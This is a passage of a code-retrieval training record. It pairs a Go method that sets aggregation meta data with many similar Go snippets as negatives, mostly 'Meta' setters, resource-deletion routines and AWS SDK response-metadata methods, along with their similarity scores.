!= nil {\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"resource\": name,\n\t\t\t\"error\": err,\n\t\t}).Warn(\"Delete collection in DB failed, find resource failed.\")\n\t\treturn nil, base.NewErrorResponseTransactionError()\n\t}\n\n\tif err := tx.Where(\"\\\"ServerGroupID\\\" <> ?\", DefaultServerGroupID).Delete(entity.ServerServerGroup{}).Error; err != nil {\n\t\ttx.Rollback()\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"resource\": name,\n\t\t\t\"error\": err,\n\t\t}).Warn(\"Delete collection in DB failed, delete resources failed, transaction rollback.\")\n\t\treturn nil, base.NewErrorResponseTransactionError()\n\t}\n\tret, errorResp := impl.TemplateImpl.ConvertFindResultToModel(recordCollection)\n\tif errorResp != nil {\n\t\ttx.Rollback()\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"resource\": name,\n\t\t\t\"errorResp\": errorResp.ID,\n\t\t}).Warn(\"Delete collection in DB failed, convert find result failed, transaction rollback.\")\n\t\treturn nil, errorResp\n\t}\n\tif err := tx.Commit().Error; err != nil {\n\t\tlog.WithFields(log.Fields{\n\t\t\t\"resource\": name,\n\t\t\t\"error\": err,\n\t\t}).Warn(\"Delete collection in DB failed, commit failed.\")\n\t\treturn nil, base.NewErrorResponseTransactionError()\n\t}\n\treturn ret, nil\n}", "func (r *azureManagedControlPlaneReconciler) Delete(ctx context.Context, scope *scope.ManagedControlPlaneScope) error {\n\tmanagedClusterSpec := &managedclusters.Spec{\n\t\tName: scope.ControlPlane.Name,\n\t\tResourceGroup: scope.ControlPlane.Spec.ResourceGroup,\n\t\tLocation: scope.ControlPlane.Spec.Location,\n\t\tTags: scope.ControlPlane.Spec.AdditionalTags,\n\t\tVersion: strings.TrimPrefix(scope.ControlPlane.Spec.Version, \"v\"),\n\t\tSSHPublicKey: scope.ControlPlane.Spec.SSHPublicKey,\n\t\tDNSServiceIP: scope.ControlPlane.Spec.DNSServiceIP,\n\t}\n\n\tif scope.ControlPlane.Spec.NetworkPlugin != nil {\n\t\tmanagedClusterSpec.NetworkPlugin = *scope.ControlPlane.Spec.NetworkPlugin\n\t}\n\tif scope.ControlPlane.Spec.NetworkPolicy != nil {\n\t\tmanagedClusterSpec.NetworkPolicy = *scope.ControlPlane.Spec.NetworkPolicy\n\t}\n\tif scope.ControlPlane.Spec.LoadBalancerSKU != nil {\n\t\tmanagedClusterSpec.LoadBalancerSKU = *scope.ControlPlane.Spec.LoadBalancerSKU\n\t}\n\n\tscope.V(2).Info(\"Deleting managed cluster\")\n\tif err := r.managedClustersSvc.Delete(ctx, managedClusterSpec); err != nil {\n\t\treturn errors.Wrapf(err, \"failed to delete managed cluster %s\", scope.ControlPlane.Name)\n\t}\n\n\tscope.V(2).Info(\"Deleting managed cluster resource group\")\n\tif err := r.groupsSvc.Delete(ctx); err != nil {\n\t\treturn errors.Wrapf(err, \"failed to delete managed cluster resource group\")\n\t}\n\n\treturn nil\n}", "func (r *ContainerizedWorkloadReconciler) cleanupResources(ctx context.Context,\n\tworkload *oamv1alpha2.ContainerizedWorkload, deployUID, serviceUID *types.UID) error {\n\tlog := r.Log.WithValues(\"gc deployment\", workload.Name)\n\tvar deploy appsv1.Deployment\n\tvar service corev1.Service\n\tfor _, res := range workload.Status.Resources {\n\t\tuid := res.UID\n\t\tif res.Kind == KindDeployment {\n\t\t\tif uid != *deployUID {\n\t\t\t\tlog.Info(\"Found an orphaned deployment\", \"deployment UID\", *deployUID, \"orphaned UID\", uid)\n\t\t\t\tdn := client.ObjectKey{Name: res.Name, Namespace: workload.Namespace}\n\t\t\t\tif err := r.Get(ctx, dn, &deploy); err != nil {\n\t\t\t\t\tif apierrors.IsNotFound(err) {\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tif err := r.Delete(ctx, &deploy); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tlog.Info(\"Removed an orphaned deployment\", \"deployment UID\", *deployUID, \"orphaned UID\", uid)\n\t\t\t}\n\t\t} else if res.Kind == KindService {\n\t\t\tif uid != *serviceUID {\n\t\t\t\tlog.Info(\"Found an orphaned service\", \"orphaned UID\", uid)\n\t\t\t\tsn := client.ObjectKey{Name: res.Name, Namespace: workload.Namespace}\n\t\t\t\tif err := r.Get(ctx, sn, &service); err != nil {\n\t\t\t\t\tif apierrors.IsNotFound(err) {\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tif err := r.Delete(ctx, &service); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tlog.Info(\"Removed an orphaned service\", \"orphaned UID\", uid)\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}" ]
[ "0.7039469", "0.6500067", "0.6473653", "0.6403441", "0.63773626", "0.60974884", "0.60132223", "0.5994559", "0.5870117", "0.58634305", "0.5807364", "0.5782578", "0.5775964", "0.57438874", "0.57385606", "0.56440526", "0.56085396", "0.5581031", "0.5575552", "0.5569227", "0.55610806", "0.5505452", "0.54817057", "0.5459495", "0.54354346", "0.5417337", "0.5402905", "0.53863907", "0.5371944", "0.5362673", "0.5356301", "0.53541183", "0.5345722", "0.5325306", "0.5321577", "0.5306843", "0.529574", "0.52909166", "0.5285712", "0.528049", "0.52713186", "0.52640045", "0.5259603", "0.5252044", "0.5242483", "0.52349734", "0.52229905", "0.52166075", "0.519116", "0.5164005", "0.516061", "0.5150445", "0.5125384", "0.5122379", "0.5118196", "0.5099879", "0.5058933", "0.50453687", "0.5029061", "0.5004978", "0.50047386", "0.5004004", "0.49965882", "0.49956986", "0.4991123", "0.49831685", "0.49697748", "0.49627417", "0.49526396", "0.4948241", "0.49473673", "0.49473673", "0.49420273", "0.4936552", "0.4935415", "0.49261302", "0.49232402", "0.4909297", "0.4900883", "0.4894288", "0.48871505", "0.48839515", "0.48756677", "0.48741126", "0.48738042", "0.48728633", "0.48713598", "0.4859695", "0.48474532", "0.48425433", "0.4825466", "0.4822823", "0.4815627", "0.4815488", "0.48131436", "0.48060668", "0.48027384", "0.4801892", "0.4792359", "0.47904128" ]
0.81050515
0
Meta sets the meta data to be included in the aggregation response.
func (a *ChildrenAggregation) Meta(metaData map[string]interface{}) *ChildrenAggregation { a.meta = metaData return a }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (a *FilterAggregation) Meta(metaData map[string]interface{}) *FilterAggregation {\n\ta.meta = metaData\n\treturn a\n}", "func (a *AdjacencyMatrixAggregation) Meta(metaData map[string]interface{}) *AdjacencyMatrixAggregation {\n\ta.meta = metaData\n\treturn a\n}", "func (o *GetRecipeInformation200ResponseExtendedIngredientsInner) SetMeta(v []string) {\n\to.Meta = v\n}", "func (a *APITest) Meta(meta map[string]interface{}) *APITest {\n\ta.meta = meta\n\treturn a\n}", "func Meta(key, value string) Option {\n\treturn setHeader(\"X-Oss-Meta-\"+key, value)\n}", "func setMeta(resp http.ResponseWriter, m *structs.QueryMeta) {\n\tsetIndex(resp, m.Index)\n\tsetLastContact(resp, m.LastContact)\n\tsetKnownLeader(resp, m.KnownLeader)\n\tsetConsistency(resp, m.ConsistencyLevel)\n}", "func (cr *CommandResponse) AddMeta(name, value string) {\n\tcr.Metadata = append(cr.Metadata, CommandResponseMetadata{\n\t\tName: name,\n\t\tValue: value,\n\t})\n}", "func (resp *DataResponse) SetMeta(meta interface{}) error {\n\tkind := reflect.ValueOf(meta).Kind()\n\tif kind != reflect.Struct {\n\t\treturn errors.New(\"Argument meta should be of type struct!\")\n\t}\n\tresp.Meta = meta\n\treturn nil\n}", "func (o *CustomfieldCustomFieldsResponse) SetMeta(v ViewMeta) {\n\to.Meta = &v\n}", "func (res *Resource) Meta(meta *Meta) *Meta {\n\tif res.GetMeta(meta.Name) != nil {\n\t\tutils.ExitWithMsg(\"Duplicated meta %v defined for resource %v\", meta.Name, res.Name)\n\t}\n\tres.Metas = append(res.Metas, meta)\n\tmeta.baseResource = res\n\tmeta.updateMeta()\n\treturn meta\n}", "func MetaHandler(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\tw.Header().Set(\"Access-Control-Allow-Headers\", \"Content-Type\")\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\n\tif r.Method == \"OPTIONS\" {\n\t\treturn\n\t}\n\n\tlog.Println(\"Received a GET request for retrieving meta data\")\n\n\t// Query db for the specific search criterion\n\tjs, err := dao.NewEventDao(db.DashDB).MetaMapping()\n\tif err != nil {\n\t\thttp.Error(w, err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tw.Write(js)\n\tlog.Println(\"Meta data obtained successfully\")\n}", "func (a *App) GetAllMeta(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(types.ContentType, types.ContentTypeApplicationJSON)\n\tdocs, err := a.Meta.GetMetaDocAll(a.correlationID)\n\tif err != nil {\n\t\trespondWithError(err, http.StatusNotFound, w)\n\t\treturn\n\t}\n\tdocs, _ = StripBlobStore(docs)\n\terr = json.NewEncoder(w).Encode(docs)\n\tif err != nil {\n\t\trespondWithError(err, http.StatusInternalServerError, w)\n\t\treturn\n\t}\n}", "func (e *Extractor) Meta(key, val string) error {\n\tif e.info == nil {\n\t\te.info = make(map[string]string, 1)\n\t}\n\te.info[key] = val\n\treturn nil\n}", "func (o *TimerTimersResponse) SetMeta(v ViewMeta) {\n\to.Meta = &v\n}", "func (src *BgplgdSource) makeResponseMeta() *api.Meta {\n\treturn &api.Meta{\n\t\tCacheStatus: api.CacheStatus{\n\t\t\tCachedAt: time.Now().UTC(),\n\t\t},\n\t\tVersion: BgplgdSourceVersion,\n\t\tResultFromCache: false,\n\t\tTTL: time.Now().UTC().Add(src.cfg.CacheTTL),\n\t}\n}", "func (m *Mutator) Meta(ctx context.Context) (Meta, error) {\n\tif err := m.cache(ctx); err != nil {\n\t\treturn Meta{}, errors.Wrap(err, \"getting cache failed\")\n\t}\n\n\tvar created time.Time\n\tif m.config.Created != nil {\n\t\tcreated = *m.config.Created\n\t}\n\treturn Meta{\n\t\tCreated: created,\n\t\tAuthor: m.config.Author,\n\t\tArchitecture: m.config.Architecture,\n\t\tOS: m.config.OS,\n\t}, nil\n}", "func SetMetaData() gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\t\tif hh.IsStaticFile(c) {\n\t\t\tc.Next()\n\t\t\treturn\n\t\t}\n\t\tlg.Info(\"[SetMetaData]\")\n\n\t\t//Context Meta Data\n\t\t//http.Header{\n\t\t// \"Referer\":[]string{\"http://localhost:9999/\"},\n\t\t// \"Accept-Language\":[]string{\"ja,en-US;q=0.8,en;q=0.6,de;q=0.4,nl;q=0.2\"},\n\t\t// \"X-Frame-Options\":[]string{\"deny\"},\n\t\t// \"Content-Security-Policy\":[]string{\"default-src 'none'\"},\n\t\t// \"X-Xss-Protection\":[]string{\"1, mode=block\"},\n\t\t// \"Connection\":[]string{\"keep-alive\"},\n\t\t// \"Accept\":[]string{\"application/json, text/javascript, */*; q=0.01\"},\n\t\t// \"User-Agent\":[]string{\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\"},\n\t\t// \"X-Content-Type-Options\":[]string{\"nosniff\"},\n\t\t// \"X-Requested-With\":[]string{\"XMLHttpRequest\"},\n\t\t// \"X-Custom-Header-Gin\":[]string{\"key\"},\n\t\t// \"Content-Type\":[]string{\"application/x-www-form-urlencoded\"},\n\t\t// \"Accept-Encoding\":[]string{\"gzip, deflate, sdch\"}}\n\n\t\t//Ajax\n\t\tif IsXHR(c) {\n\t\t\tc.Set(\"ajax\", \"1\")\n\t\t} else {\n\t\t\tc.Set(\"ajax\", \"0\")\n\t\t}\n\n\t\t//Response Data\n\t\tif IsAcceptHeaderJSON(c) {\n\t\t\tc.Set(\"responseData\", \"json\")\n\t\t} else {\n\t\t\tc.Set(\"responseData\", \"html\")\n\t\t}\n\n\t\t//Requested Data\n\t\tif IsContentTypeJSON(c) {\n\t\t\tc.Set(\"requestData\", \"json\")\n\t\t} else {\n\t\t\tc.Set(\"requestData\", \"data\")\n\t\t}\n\n\t\t//User Agent\n\t\tc.Set(\"userAgent\", GetUserAgent(c))\n\n\t\t//Language\n\t\tc.Set(\"language\", GetLanguage(c))\n\n\t\tc.Next()\n\t}\n}", "func SetMeta(data map[string]interface{}) {\n\tlogr = logr.With(data)\n}", "func (r *DescribeAggregationAuthorizationsResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (build DocumentBuilder) SetMeta(key string, value interface{}) DocumentBuilder {\n\tif build.doc.Meta == nil {\n\t\tbuild.doc.Meta = Dict{}\n\t}\n\tbuild.doc.Meta[key] = value\n\treturn build\n}", "func MetaFilter(req *restful.Request, resp *restful.Response, chain *restful.FilterChain) {\n\tencodedMeta := req.HeaderParameter(PluginMetaHeader)\n\tif encodedMeta == \"\" {\n\t\tchain.ProcessFilter(req, resp)\n\t\treturn\n\t}\n\n\tdecodedMeta, err := base64.StdEncoding.DecodeString(encodedMeta)\n\tif err != nil {\n\t\terrors.HandleError(req, resp, fmt.Errorf(\"decode meta error: %s\", err.Error()))\n\t\treturn\n\t}\n\n\tmeta := &Meta{}\n\tif err = json.Unmarshal(decodedMeta, meta); err != nil {\n\t\terrors.HandleError(req, resp, fmt.Errorf(\"decode meta error: %s\", err.Error()))\n\t\treturn\n\t}\n\n\tctx := req.Request.Context()\n\treq.Request = req.Request.WithContext(meta.WithContext(ctx))\n\n\tchain.ProcessFilter(req, resp)\n}", "func (m *ccMetric) Meta() map[string]string {\n\treturn m.meta\n}", "func (d *ResultEncoder) EncodeMeta(src []byte) []byte {\n\treturn d.EncodeWith(src, d.encoding)\n}", "func (o *CustomfieldCustomFieldsResponse) HasMeta() bool {\n\tif o != nil && o.Meta != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (msg *Error) SetMeta(data any) *Error {\n\tmsg.Meta = data\n\treturn msg\n}", "func (o *AssigneeFormAssigneesResponse) SetMeta(v ViewMeta) {\n\to.Meta = &v\n}", "func (o *NotebookNotebooksResponse) SetMeta(v ViewMeta) {\n\to.Meta = &v\n}", "func (r *DescribeEventAggregatesResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (p *Provider) SetMeta(v interface{}) {\n\tp.meta = v\n}", "func (reqBody *ElasticsearchQueryBody) getAggregationsMeta() (map[string]*AggregationMeta, error) {\n\taggsToType := map[string]string{}\n\n\tfor aggName, agg := range reqBody.Aggregations {\n\t\terr := getAggregationsWithType(aggName, agg, aggsToType)\n\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\treturn getAggregationsMetaHelper(aggsToType), nil\n}", "func (p *Provider) Meta() interface{} {\n\treturn p.meta\n}", "func (o *GetRecipeInformation200ResponseExtendedIngredientsInner) HasMeta() bool {\n\tif o != nil && o.Meta != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (u User) Meta() (m map[string][]string) {\n\tm = make(map[string][]string)\n\tjson.Unmarshal([]byte(u.MetaJSON), &m)\n\treturn\n}", "func Meta(name, namespace, kind string) *MetaResource {\n\treturn &MetaResource{\n\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\tNamespace: namespace,\n\t\t\tName: name,\n\t\t},\n\t\tTypeMeta: metav1.TypeMeta{\n\t\t\tKind: kind,\n\t\t\tAPIVersion: EventingAPIVersion,\n\t\t},\n\t}\n}", "func (post Post) JSONAPIMeta() *jsonapi.Meta {\n\treturn &jsonapi.Meta{\n\t\t\"detail\": \"extra details regarding the post\",\n\t}\n}", "func (mnuo *MedicalNoteUpdateOne) SetMeta(s []string) *MedicalNoteUpdateOne {\n\tmnuo.meta = &s\n\treturn mnuo\n}", "func APIResponseMeta(c *gin.Context, code int, data interface{}) (int, map[string]interface{}) {\n\trequestID := c.MustGet(\"RequestID\")\n\tif requestID == \"\" {\n\t\trequestID = \"InValidID\"\n\t}\n\n\tcodeMsg := http.StatusText(code)\n\tif codeMsg == \"\" {\n\t\tcodeMsg = GetStatusText(code)\n\t}\n\treturn code, gin.H{\n\t\t\"meta\": map[string]interface{}{\n\t\t\t\"requestID\": requestID,\n\t\t\t\"requestTime\": time.Now().Format(\"2006/01/02 15:04:05\"),\n\t\t},\n\t\t\"data\": data,\n\t\t\"status\": map[string]interface{}{\n\t\t\t\"code\": code,\n\t\t\t\"msg\": codeMsg,\n\t\t},\n\t}\n}", "func (m *ccMetric) AddMeta(key, value string) {\n\tm.meta[key] = value\n}", "func (r *CreateReplicationGroupResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (o PeeringOutput) Meta() pulumi.StringMapOutput {\n\treturn o.ApplyT(func(v *Peering) pulumi.StringMapOutput { return v.Meta }).(pulumi.StringMapOutput)\n}", "func PostMeta(key, value string) PostOption {\n\treturn setMultipartField(\"x-oss-meta-\"+key, value)\n}", "func (a *AllApiService) Meta(ctx _context.Context, apiPath string) (InlineResponse200, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHttpMethod = _nethttp.MethodPost\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue InlineResponse200\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/meta/{apiPath}\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"apiPath\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", apiPath)), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\t// to determine the Content-Type header\n\tlocalVarHttpContentTypes := []string{}\n\n\t// set Content-Type header\n\tlocalVarHttpContentType := selectHeaderContentType(localVarHttpContentTypes)\n\tif localVarHttpContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHttpContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHttpHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHttpHeaderAccept := selectHeaderAccept(localVarHttpHeaderAccepts)\n\tif localVarHttpHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHttpHeaderAccept\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHttpMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHttpResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHttpResponse == nil {\n\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHttpResponse.Body)\n\tlocalVarHttpResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHttpResponse, err\n\t}\n\n\tif localVarHttpResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHttpResponse.Status,\n\t\t}\n\t\tif localVarHttpResponse.StatusCode == 200 {\n\t\t\tvar v InlineResponse200\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\t\tif localVarHttpResponse.StatusCode == 400 {\n\t\t\tvar v ModelError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHttpResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHttpResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHttpResponse, nil\n}", "func (r *PurchaseReservedElasticsearchInstanceOfferingResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (r *DescribeThingGroupResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (o *AttachmentArray) SetMeta(v Meta) {\n\to.Meta = v\n}", "func (o *TimerTimersResponse) HasMeta() bool {\n\tif o != nil && o.Meta != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (s *Snapshot) Meta() Metadata {\n\treturn s.meta\n}", "func Meta(attrs []htmlgo.Attribute) HTML {\n\treturn &htmlgo.Tree{Tag: \"meta\", Attributes: attrs, SelfClosing: true}\n}", "func (_MetaObject *MetaObjectTransactor) PutMeta(opts *bind.TransactOpts, key []byte, value []byte) (*types.Transaction, error) {\n\treturn _MetaObject.contract.Transact(opts, \"putMeta\", key, value)\n}", "func (o *PermissionOptionsPagination) SetMeta(v PaginationMeta) {\n\to.Meta = &v\n}", "func (o *AssigneeFormAssigneesResponse) HasMeta() bool {\n\tif o != nil && o.Meta != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (h *HTTPApi) showMetadata(w http.ResponseWriter, r *http.Request, ps httprouter.Params) {\n\tmeta := h.storageNode.Datasources[ps.ByName(\"datasource\")].GetMeta()\n\n\t// Now we need to return the results\n\tif bytes, err := json.Marshal(meta); err != nil {\n\t\t// TODO: log this better?\n\t\tw.WriteHeader(http.StatusInternalServerError)\n\t\treturn\n\t} else {\n\t\tw.Header().Set(\"Content-Type\", \"application/json\")\n\t\tw.Write(bytes)\n\t}\n}", "func (o DashboardLensResponseOutput) Metadata() pulumi.MapOutput {\n\treturn o.ApplyT(func(v DashboardLensResponse) map[string]interface{} { return v.Metadata }).(pulumi.MapOutput)\n}", "func (_BaseLibrary *BaseLibraryTransactor) PutMeta(opts *bind.TransactOpts, key []byte, value []byte) (*types.Transaction, error) {\n\treturn _BaseLibrary.contract.Transact(opts, \"putMeta\", key, value)\n}", "func (r *AssociateIpGroupsResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (r *CreatePackagingConfigurationResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (o *CustomfieldCustomFieldsResponse) GetMeta() ViewMeta {\n\tif o == nil || o.Meta == nil {\n\t\tvar ret ViewMeta\n\t\treturn ret\n\t}\n\treturn *o.Meta\n}", "func (n *wrapped) Metadata() a.Object {\n\treturn n.meta\n}", "func (o *PermissionOptionsPagination) HasMeta() bool {\n\tif o != nil && o.Meta != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (r *CreateIndexResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func GenerateMeta(id string, args map[string]interface{}) error {\n\tpipeline, err := GetPipeline(id)\n\tif err != nil {\n\t\treturn err\n\t}\n\treq, err := pipeline.NewMetaRequest(args)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn pipeline.Generate(req)\n}", "func (n *node) GetAllMeta() map[string]string {\n\treturn n.meta\n}", "func (r *UpdateGatewayGroupResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (mnu *MedicalNoteUpdate) SetMeta(s []string) *MedicalNoteUpdate {\n\tmnu.meta = &s\n\treturn mnu\n}", "func (r *CreateDBParameterGroupResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (o ApiOutput) MetaData() GoogleCloudApigeeV1EntityMetadataResponseOutput {\n\treturn o.ApplyT(func(v *Api) GoogleCloudApigeeV1EntityMetadataResponseOutput { return v.MetaData }).(GoogleCloudApigeeV1EntityMetadataResponseOutput)\n}", "func Meta() *plugin.PluginMeta {\n\treturn plugin.NewPluginMeta(Name, Version, Type, []string{plugin.SnapGOBContentType}, []string{plugin.SnapGOBContentType})\n}", "func Meta() *plugin.PluginMeta {\n\treturn plugin.NewPluginMeta(Name, Version, Type, []string{plugin.SnapGOBContentType}, []string{plugin.SnapGOBContentType})\n}", "func setCacheMeta(resp http.ResponseWriter, m *cache.ResultMeta) {\n\tif m == nil {\n\t\treturn\n\t}\n\tstr := \"MISS\"\n\tif m.Hit {\n\t\tstr = \"HIT\"\n\t}\n\tresp.Header().Set(\"X-Cache\", str)\n\tif m.Hit {\n\t\tresp.Header().Set(\"Age\", fmt.Sprintf(\"%.0f\", m.Age.Seconds()))\n\t}\n}", "func (r *ListInstanceGroupsResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func Meta(property string) PropertyItem {\n\tp := PropertyItem{\n\t\tProperty: property,\n\t\tType: MetaType,\n\t\tIsPrefix: false,\n\t}\n\treturn p\n}", "func (r *SetUICustomizationResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (r *ListReportsForReportGroupResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (s *Source) GetMeta() map[string]utils.Meta {\n\tmeta := make(map[string]utils.Meta)\n\tmeta[\"offset_agent\"] = utils.NewMeta(\"offset_agent\", s.Offset)\n\treturn meta\n}", "func (o DashboardPartsResponseOutput) Metadata() pulumi.AnyOutput {\n\treturn o.ApplyT(func(v DashboardPartsResponse) interface{} { return v.Metadata }).(pulumi.AnyOutput)\n}", "func (r *ListIngestionsResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (r *CreateRelationalDatabaseFromSnapshotResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (r *StartReportCreationResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (r *ListGroupsResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (r *AssociateProactiveEngagementDetailsResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (n *node) AddMeta(name string, data string) Node {\n\tn.meta[name] = data\n\treturn n\n}", "func (o *NotebookNotebooksResponse) HasMeta() bool {\n\tif o != nil && o.Meta != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (r *RegisterUsageResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (r *RegisterUsageResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (bi *bucketInternal) UpsertMeta(key string, value, extra []byte, flags, expiry uint32, cas, revseqno uint64) (Cas, error) {\n\toutcas, _, err := bi.b.upsertMeta(key, value, extra, flags, expiry, cas, revseqno)\n\treturn outcas, err\n}", "func (r *ModifyReplicationGroupResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func Meta() *plugin.PluginMeta {\n\treturn plugin.NewPluginMeta(name, version, pluginType, []string{plugin.SnapGOBContentType}, []string{plugin.SnapGOBContentType})\n}", "func Meta() *plugin.PluginMeta {\n\treturn plugin.NewPluginMeta(name, version, pluginType, []string{plugin.SnapGOBContentType}, []string{plugin.SnapGOBContentType})\n}", "func Meta() *plugin.PluginMeta {\n\treturn plugin.NewPluginMeta(\n\t\tPluginName,\n\t\tVersion,\n\t\tplugin.CollectorPluginType,\n\t\t[]string{plugin.SnapGOBContentType},\n\t\t[]string{plugin.SnapGOBContentType},\n\t\tplugin.ConcurrencyCount(1),\n\t)\n}", "func (s *ServerGroup) Metadata(ctx context.Context, metric, limit string) (map[string][]v1.Metadata, error) {\n\treturn s.State().apiClient.Metadata(ctx, metric, limit)\n}", "func MetaResponse(code int, msg string) Response {\n\treturn Response{\n\t\tCode: code,\n\t\tData: nil,\n\t\tMessage: msg,\n\t}\n}", "func (si *StraddleIter) Meta() *finance.OptionsMeta {\n\treturn si.Iter.Meta().(*finance.OptionsMeta)\n}", "func (MetaConfig) ConfigureMeta(Metaor) {\n}", "func (r *ListEndpointGroupsResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (r *AddPermissionResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func (x *NetworkInfoResponse) SetMetaHeader(v *session.ResponseMetaHeader) {\n\tif x != nil {\n\t\tx.MetaHeader = v\n\t}\n}", "func (r *ModifyEventSubscriptionResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func Meta() *plugin.PluginMeta {\n\treturn plugin.NewPluginMeta(Name, Version, PluginType, []string{plugin.SnapGOBContentType}, []string{plugin.SnapGOBContentType})\n}", "func (r *CreateMatchmakingRuleSetResponse) SDKResponseMetdata() *aws.Response {\n\treturn r.response\n}", "func EncodeMetaResponse(encoder func(context.Context, http.ResponseWriter) goahttp.Encoder) func(context.Context, http.ResponseWriter, interface{}) error {\n\treturn func(ctx context.Context, w http.ResponseWriter, v interface{}) error {\n\t\tres := v.(*sensor.MetaResult)\n\t\tenc := encoder(ctx, w)\n\t\tbody := res.Object\n\t\tw.WriteHeader(http.StatusOK)\n\t\treturn enc.Encode(body)\n\t}\n}" ]
